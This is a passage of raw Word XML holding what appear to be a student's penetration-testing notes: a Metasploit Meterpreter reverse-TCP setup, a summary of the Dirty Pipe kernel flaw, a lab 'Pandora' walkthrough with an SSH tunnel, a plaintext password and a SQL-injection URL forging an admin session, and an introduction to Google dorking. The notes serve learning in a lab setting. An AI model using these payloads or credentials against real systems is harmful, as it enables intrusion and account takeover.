        <w:t>linux/x86/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F4896D" w14:textId="2148EEF8" w:rsidR="00384197" w:rsidRDefault="00384197" w:rsidP="009F2C93"/>
    <w:p w14:paraId="060467CE" w14:textId="2FDAB3B8" w:rsidR="00384197" w:rsidRDefault="00384197" w:rsidP="00384197">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>LHOST :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">- (my machine ip ) </w:t>
      </w:r>
      <w:r w:rsidRPr="00384197">
        <w:t>10.10.14.31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD0888" w14:textId="47EE57AC" w:rsidR="00384197" w:rsidRDefault="00384197" w:rsidP="009F2C93">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>LPORT :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>- 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA63A47" w14:textId="3481B583" w:rsidR="00384197" w:rsidRDefault="00384197" w:rsidP="009F2C93">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Show target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D3E26" w14:textId="23AD6248" w:rsidR="00384197" w:rsidRDefault="00384197" w:rsidP="009F2C93">
      <w:r>
        <w:t>Set target 1 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00384197">
        <w:t>x86_64 (64-bit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA027D1" w14:textId="14245798" w:rsidR="00384197" w:rsidRDefault="00384197" w:rsidP="009F2C93"/>
    <w:p w14:paraId="51410D74" w14:textId="110E101B" w:rsidR="00384197" w:rsidRDefault="00384197" w:rsidP="009F2C93">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC640B5" w14:textId="0E9FDEE2" w:rsidR="00384197" w:rsidRDefault="00CE7AEF" w:rsidP="009F2C93">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00065FED" wp14:editId="220CCFF7">
            <wp:extent cx="5731510" cy="12515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2D56" w14:textId="26A9C177" w:rsidR="00384197" w:rsidRDefault="00CE7AEF" w:rsidP="009F2C93">
      <w:r>
        <w:t xml:space="preserve">How we enter into the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596FA7CE" w14:textId="1C8DD565" w:rsidR="00CE7AEF" w:rsidRDefault="00CE7AEF" w:rsidP="009F2C93">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79C9A23E" wp14:editId="27E1CD4D">
            <wp:extent cx="5731510" cy="32867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75D3" w14:textId="42F97C9E" w:rsidR="003243E0" w:rsidRDefault="003243E0" w:rsidP="00916592">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="182C8241" w14:textId="29A5482C" w:rsidR="00916592" w:rsidRDefault="008924E6" w:rsidP="00916592">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06340A41" w14:textId="77777777" w:rsidR="00357ADC" w:rsidRDefault="00357ADC" w:rsidP="008924E6">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0896FB62" w14:textId="77777777" w:rsidR="00357ADC" w:rsidRDefault="00357ADC" w:rsidP="008924E6">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F807B95" w14:textId="77777777" w:rsidR="00357ADC" w:rsidRDefault="00357ADC" w:rsidP="008924E6">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E5C24F9" w14:textId="77777777" w:rsidR="00357ADC" w:rsidRDefault="00357ADC" w:rsidP="008924E6">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B80B554" w14:textId="28A1177A" w:rsidR="002766B5" w:rsidRDefault="00357ADC" w:rsidP="008924E6">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="double"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00516322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002766B5" w:rsidRPr="00516322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="double"/>
        </w:rPr>
        <w:t>How We Exploit The kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719ACD70" w14:textId="5AC828A3" w:rsidR="007B6458" w:rsidRDefault="007B6458" w:rsidP="007B6458"/>
    <w:p w14:paraId="4BCBE53B" w14:textId="1D257093" w:rsidR="007B6458" w:rsidRPr="007B6458" w:rsidRDefault="007B6458" w:rsidP="007B6458">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C75BB8F" w14:textId="02A2183A" w:rsidR="002766B5" w:rsidRDefault="002766B5" w:rsidP="002766B5"/>
    <w:p w14:paraId="1F882192" w14:textId="52A557DB" w:rsidR="007B6458" w:rsidRDefault="007B6458" w:rsidP="007B6458">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Dirty Pipe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CC4D39" w14:textId="1E15CE9B" w:rsidR="007B6458" w:rsidRDefault="007B6458" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2022-0847 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686C5D58" w14:textId="77777777" w:rsidR="00C86D3E" w:rsidRDefault="007B6458" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">A flaw was found in the way the “flags” member of the </w:t>
      </w:r>
      <w:r w:rsidR="00C86D3E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">new pipe buffer structure was lacking proper initialization in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C86D3E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>copy_page_to_iter_pipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C86D3E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C86D3E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>push_pipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C86D3E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> functions in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C86D3E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C86D3E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> kernel and could thus contain stale values. An </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C86D3E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>unpriviledged</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C86D3E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> local user could </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C86D3E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this flaws</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C86D3E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to write to pages in the page cache backed by read could only files and as such escalated their privileges on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3213FC9B" w14:textId="77777777" w:rsidR="00C86D3E" w:rsidRDefault="00C86D3E" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08ADBEF9" w14:textId="77777777" w:rsidR="007152E8" w:rsidRDefault="00C86D3E" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerability is unofficially rated at a critically </w:t>
      </w:r>
      <w:r w:rsidR="007152E8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>server score of 8.8, which is extremely high for a local vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E811E63" w14:textId="77777777" w:rsidR="007152E8" w:rsidRDefault="007152E8" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6739FD2F" w14:textId="77777777" w:rsidR="007152E8" w:rsidRDefault="007152E8" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2022-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0847 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a vulnerability in the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kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>unpriviledged</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> processes can inject code into root processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BCF737" w14:textId="77777777" w:rsidR="007152E8" w:rsidRDefault="007152E8" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53EF6CD7" w14:textId="77777777" w:rsidR="002C75C6" w:rsidRDefault="007152E8" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This issue reporting by </w:t>
      </w:r>
      <w:r w:rsidR="002C75C6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">“Max </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C75C6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kellermann</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C75C6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CM4all)”. It is similar to CVE-2016-5195 “Dirty Cow” but is easier to exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A01A0BF" w14:textId="77777777" w:rsidR="002C75C6" w:rsidRDefault="002C75C6" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="403C7E8D" w14:textId="0DEC522D" w:rsidR="002C75C6" w:rsidRDefault="002C75C6" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerability was fixed in Linux </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.16.11 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.15.35 , 5.10.102.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E19438B" w14:textId="6A40F200" w:rsidR="002C75C6" w:rsidRDefault="002C75C6" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5890E747" w14:textId="77777777" w:rsidR="002C75C6" w:rsidRDefault="002C75C6" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1945D5FC" w14:textId="77777777" w:rsidR="002C75C6" w:rsidRDefault="002C75C6" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0E3C44" w14:textId="77777777" w:rsidR="002C75C6" w:rsidRDefault="002C75C6" w:rsidP="007B6458">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20064E34" w14:textId="77777777" w:rsidR="00357ADC" w:rsidRDefault="00C86D3E" w:rsidP="00357AD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B6458">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0FD61E" w14:textId="627F7E06" w:rsidR="00357ADC" w:rsidRPr="00D610F5" w:rsidRDefault="00B14653" w:rsidP="00D610F5">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:u w:val="double"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D610F5">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="double"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Admin Bypass With the help of sql injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DACB8E" w14:textId="1057630D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</w:p>
    <w:p w14:paraId="037FA73E" w14:textId="56712391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3D3E5C7" wp14:editId="6B122AE6">
            <wp:extent cx="5725160" cy="32200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2EB7" w14:textId="761F163E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Here the machine of the pandora machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A53ACB" w14:textId="5DF22AB6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Localhost register </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D67E0" w14:textId="5066DB75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</w:p>
    <w:p w14:paraId="14FE049A" w14:textId="02051917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E3EB51E" wp14:editId="3A9A0A2B">
            <wp:extent cx="5725160" cy="32200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4985" w14:textId="0FEE9483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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14653">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14653">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> daniel@10.10.11.136 -L 80:localhost:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC43144" w14:textId="35E1D8D7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passwd- HotelBabylon23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C096FCB" w14:textId="77777777" w:rsidR="00B14653" w:rsidRDefault="00B14653" w:rsidP="00B14653">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA67D6C" w14:textId="55222A51" w:rsidR="009062A6" w:rsidRDefault="00B14653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search in google - </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="009062A6" w:rsidRPr="00F62786">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>https://github.com/ibnuuby/CVE-2021-32099</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="123975C1" w14:textId="77777777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</w:p>
    <w:p w14:paraId="1D58040F" w14:textId="77777777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23CEE17" wp14:editId="1FFCA71D">
            <wp:extent cx="5725160" cy="32200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4AF1" w14:textId="77777777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</w:p>
    <w:p w14:paraId="5A8874E0" w14:textId="77777777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CVE-2021-32099</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683606C3" w14:textId="3211F872" w:rsidR="00B14653" w:rsidRDefault="009062A6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POC copy - </w:t>
      </w:r>
      <w:r w:rsidR="00B14653">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00F62786">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>http://localhost:8000/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="295D801C" w14:textId="0E0751A7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</w:p>
    <w:p w14:paraId="74B7181E" w14:textId="5DCCD0A2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Decode the url with the help of url decoder </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t>:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="156CBC15" w14:textId="07783452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</w:p>
    <w:p w14:paraId="297BD43B" w14:textId="3716FF79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F473101" wp14:editId="0B4F7050">
            <wp:extent cx="5725160" cy="32200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515A" w14:textId="0EF48C44" w:rsidR="009062A6" w:rsidRDefault="009062A6" w:rsidP="00B14653">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B5D888" w14:textId="40D2A46A" w:rsidR="009062A6" w:rsidRDefault="00D610F5" w:rsidP="00B146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06D2DA7" wp14:editId="365EB722">
            <wp:extent cx="5725160" cy="32200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40FC" w14:textId="7A9BF283" w:rsidR="00D610F5" w:rsidRDefault="00D610F5" w:rsidP="00B14653">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F17DCFF" w14:textId="77777777" w:rsidR="00D610F5" w:rsidRDefault="00D610F5" w:rsidP="00D610F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Admin panel bypass with the help </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>of  sql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injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3804AA04" w14:textId="6EAEAAB5" w:rsidR="008B349E" w:rsidRPr="00D610F5" w:rsidRDefault="00D610F5" w:rsidP="00D610F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    </w:t>
      </w:r>
      <w:r w:rsidR="008B349E" w:rsidRPr="00357ADC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="double"/>
        </w:rPr>
        <w:t>Google Hacking (Dorking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE4BB3F" w14:textId="42A486F2" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="008B349E"/>
    <w:p w14:paraId="37F6B09A" w14:textId="2DF18C94" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="008B349E"/>
    <w:p w14:paraId="26AACEC7" w14:textId="1D6C0458" w:rsidR="008B349E" w:rsidRPr="009D764B" w:rsidRDefault="008B349E" w:rsidP="008B349E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>What a google dork?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EF6468" w14:textId="35CEC1B5" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="008B349E">
      <w:r>
        <w:t xml:space="preserve">Google dorking is a hacker technique that uses Google Search </w:t>
      </w:r>
      <w:r w:rsidR="007F3A38">
        <w:t>and other Google application to find security holes in the configuration and computer code that websites are using. [Google dorking could also be used for OSINT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EA0F40" w14:textId="4957E390" w:rsidR="007F3A38" w:rsidRDefault="007F3A38" w:rsidP="008B349E"/>
    <w:p w14:paraId="4BC1F8EF" w14:textId="41F68C51" w:rsidR="007F3A38" w:rsidRDefault="007F3A38" w:rsidP="008B349E">
      <w:r>
        <w:t>A Google dork is a search string that uses Google’s custom search operators to filter down search results. When used creatively, these filter down</w:t>
      </w:r>
      <w:r w:rsidR="00EC5B2F">
        <w:t xml:space="preserve"> search results. When used creatively, these filters</w:t>
      </w:r>
      <w:r w:rsidR="00516322">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A71D033" w14:textId="64E050F6" w:rsidR="003F41FD" w:rsidRDefault="003F41FD" w:rsidP="008B349E">
      <w:r>
        <w:t>Down search operators to filter down search results. When used creatively, these filters can return information that wasn’t meant to be found. Exploiting google dorking or Google hacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8EE914" w14:textId="61905378" w:rsidR="003F41FD" w:rsidRDefault="003F41FD" w:rsidP="008B349E"/>
    <w:p w14:paraId="78DF0D10" w14:textId="0097AE07" w:rsidR="003F41FD" w:rsidRPr="009D764B" w:rsidRDefault="003F41FD" w:rsidP="003F41FD">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Advantages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FBFDBC" w14:textId="7A23775C" w:rsidR="003F41FD" w:rsidRDefault="003F41FD" w:rsidP="003F41FD">
      <w:r>
        <w:t xml:space="preserve">These operators </w:t>
      </w:r>
      <w:r w:rsidR="001C66A9">
        <w:t>provide</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the exact results which we are looking for </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB0E00E" w14:textId="7E904955" w:rsidR="003F41FD" w:rsidRDefault="003F41FD" w:rsidP="003F41FD"/>
    <w:p w14:paraId="005A3054" w14:textId="540A0062" w:rsidR="003F41FD" w:rsidRPr="009D764B" w:rsidRDefault="003F41FD" w:rsidP="003F41FD">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Disad</w:t>
      </w:r>
      <w:r w:rsidR="001C66A9" w:rsidRPr="009D764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>vantage</w:t>
      </w:r>
      <w:r w:rsidR="009D764B">
        <w:rPr>
